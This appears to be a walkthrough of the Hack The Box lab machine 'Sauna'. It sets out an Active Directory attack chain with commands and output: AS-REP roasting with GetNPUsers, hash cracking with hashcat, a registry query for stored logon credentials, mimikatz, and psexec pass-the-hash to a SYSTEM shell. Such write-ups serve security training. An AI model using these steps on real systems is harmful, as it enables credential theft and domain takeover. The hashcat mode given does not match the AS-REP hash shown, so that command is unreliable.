Sauna HTB

User

After running nmap these ports are open:

Nmap scan report for EGOTISTICALBANK (10.10.10.175)
Host is up (0.17s latency).
Not shown: 988 filtered ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-02-28 03:32:05Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=2/27%Time=5E581939%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 8h00m00s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-02-28T03:34:31
|_  start_date: N/A

First I add the domain EGOTISTICALBANK to /etc/hosts for later usage maybe. And the first thing I do is visiting the website. From the website after a bit of enumeration all I can get are a bunch of usernames from these pages:

Enumerating ldap port I get nothing more than the hostname which I already know. Running enum4linux also does not give me much. Also smbmap gives me nothing. After a bit of research I found out that companies use account username conventions. So maybe I can use some tools with these since I have a lot of ports which can allow me to specify a username without password at first.

I read about Ad user naming conventions and after I try to use the usernames against a impacket tool. The tool I use is caled GetNPUsers and it Queries target domain for users with 'Do not require Kerberos preauthentication' set and export their TGTs for cracking. After a lot of trial and error I find the password of user beeing fsmith.

/opt/impacket/examples/GetNPUsers.py EGOTISTICALBANK/fsmith -dc-ip 10.10.10.175 -request

Impacket v0.9.21.dev1+20200220.181330.03cbe6e8 - Copyright 2020 SecureAuth Corporation

Password:
[*] Cannot authenticate fsmith, getting its TGT
$krb5asrep$23$fsmith@EGOTISTICALBANK:fdb6fa679238059bc04549980ec57412$2414afe6424ecfa364ca858c8e8b4713374d1f25625add595a3a7386e4b4eccaf2aa5c1edfd59e0026222d000bed930fdb07e9500540960aa75348509adadc8def409b724dc5958b5dc4e9910c33331ef742cfd73dc405a6c6419ce6c20196c3cf90380f3c88af0b310b1b53b9f9b9c34022b9e3d33a0df0acb0fc37322aca41c6493e8d4e45aa941b5ffdebd89dd79b755ac5514dde9e08d5c381b5e9ea99cbc2ed1bc3b9703c512dac781794030804d252e723ad640cc9ca4b5ef543a9d05e4c2d6689e4414b888b5c9e6e9b6f575f837c0d8636a82f2602cf332be121d36cf259abf8d3e24b5f6d9ef3833bfcd9c502370e330c3c90cd90

This would give me the users TGT which I can crack .

hashcat -m 13100 crackme.hash /usr/share/wordlists/rockyou.txt

And I found the password Thestrokes23

I do a full port scanning with verbose on nmap to check if windows remote management is enabled. After finding it is enabled I use evil-winrm and connect to it by providing the username fsmith and the cracked password.

root

From there I run Winpeas or any other enumeration script and find a hidden password inside this registry reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

The password belongs to user svc_loanmgr and the password is Moneymakestheworldgoround!

I login again by using evil-winrm

I generate a reverse shell by using metasploit and then run it. This would give me cmd shell. I then upload mimikatz and get Administrator ntlm hash, which then I use it with psexec and get shell as nt authority\system.

psexec.py administrator@10.10.10.175 -hashes :d9485863c1e9e05851aa40cbb4ab9dff Impacket v0.9.21.dev1+20200220.181330.03cbe6e8 - Copyright 2020 SecureAuth Corporation

[] Requesting shares on 10.10.10.175….. [] Found writable share ADMIN$ [] Uploading file TkxHqRZj.exe [] Opening SVCManager on 10.10.10.175….. [] Creating service Pntp on 10.10.10.175….. [] Starting service Pntp….. [!] Press help for extra shell commands Microsoft Windows [Version 10.0.17763.973] (c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>


ReadMore: Active Directory Attacks

The quieter you become, the more you are able to hear.
DHT4tMDxN34WgmtcX9em8AGMeqMpSechq4